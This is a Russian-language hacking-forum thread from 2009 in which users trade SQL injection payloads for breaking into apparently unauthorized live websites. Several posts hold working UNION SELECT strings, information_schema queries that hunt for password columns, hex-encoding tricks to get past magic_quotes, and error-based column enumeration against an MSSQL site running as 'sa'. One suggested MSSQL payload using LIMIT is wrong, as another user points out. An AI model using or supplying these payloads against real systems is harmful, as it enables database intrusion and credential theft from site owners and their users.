ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

20.01.2009, 11:32
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме: 861008
Репутация:
58
|
|
2z00MAN вот к mysql.user нет прав) выводится ошибка SELECT command denied to user бла-бла@'localhost' for table 'user'
а када к этим обращаешся нет ни ошибки ни вывода)
|
|
|

20.01.2009, 11:42
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме: 2358980
Репутация:
930
|
|
Сообщение от j0ker13
2z00MAN вот к mysql.user нет прав) выводится ошибка SELECT command denied to user бла-бла@'localhost' for table 'user'
а када к этим обращаешся нет ни ошибки ни вывода)
попробуй так -1+union+select+1,2,3,4,5,6,7,version(),9+from+VGB_ USER+limit+1,1+--+
|
|
|

20.01.2009, 11:36
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
j0ker13, посмотри внимательно, может, всё таки не одна бд?
А ещё лучше, дабы избежать ненужных гаданий, кинь линк.
|
|
|

20.01.2009, 12:25
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме: 1292655
Репутация:
168
|
|
Сообщение от R1dex
j0ker13, посмотри внимательно, может, всё таки не одна бд?
А ещё лучше, дабы избежать ненужных гаданий, кинь линк.
если это 5 ветка, то в information_schema.columns есть колонка table_schema - название базы
сделай где то так
select concat_ws(0x3a,table_schema,table_name,column_name ) from information_schema.columns where column_name like '%pass%'
// выбрать название базы + таблицы + колонки где встречается pass
|
|
|

20.01.2009, 12:35
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Сообщение от big_BRAT
если это 5 ветка, то в information_schema.columns есть колонка table_schema - название базы
сделай где то так
select concat_ws(0x3a,table_schema,table_name,column_name ) from information_schema.columns where column_name like '%pass%'
// выбрать название базы + таблицы + колонки где встречается pass
1. Это ты мне пишешь? ))
2. Зачем так извращаться, гораздо проще, просто посмотреть в какой бд лежит таблица.
|
|
|

20.01.2009, 12:35
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме: 2358980
Репутация:
930
|
|
Сообщение от big_BRAT
если это 5 ветка, то в information_schema.columns есть колонка table_schema - название базы
сделай где то так
select concat_ws(0x3a,table_schema,table_name,column_name ) from information_schema.columns where column_name like '%pass%'
// выбрать название базы + таблицы + колонки где встречается pass
если так делать, то название колонки лучше закодировать в 0xhex, чтобы избежать лишних столкновений с magic_quotes=on
|
|
|

20.01.2009, 17:31
|
|
Новичок
Регистрация: 11.01.2009
Сообщений: 15
Провел на форуме: 8148
Репутация:
13
|
|
все снова хай! Надеюсь в этот раз вы мне поможите! )
Есть скуль на сайте, база mssql (юзер sa!)
Пытаюсь вывести имена колонок
(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns)--
выводиться имя колонки
nvarchar value 'accid' to data type int
Но имя второй вывести не могу
(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+column_name+not+in+('accid'))--
ncorrect syntax near 'accid'.
Такой вариант тоже не работает
(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+column_name+not+in+(SELECT+TOP+2+COL UMN_NAME+FROM+information_schema.columns))--
Выводит одну и туже колонку
nvarchar value 'AddLine1' to data type
Что делать? Как вывести имена колонок?
|
|
|

20.01.2009, 17:43
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
accid - переведи в hex. Без ковычек.
|
|
|

20.01.2009, 17:44
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Что делать? Как вывести имена колонок?
Юзай лимит.
(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+column_name+not+in+('accid')+LIMIT+1 ,1)--
(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+column_name+not+in+('accid')+LIMIT+2 ,1)--
SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+column_name+not+in+('accid')+LIMIT+3 ,1)--
И т.п...
|
|
|

20.01.2009, 17:45
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
MSSQL не поддерживает LIMIT
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|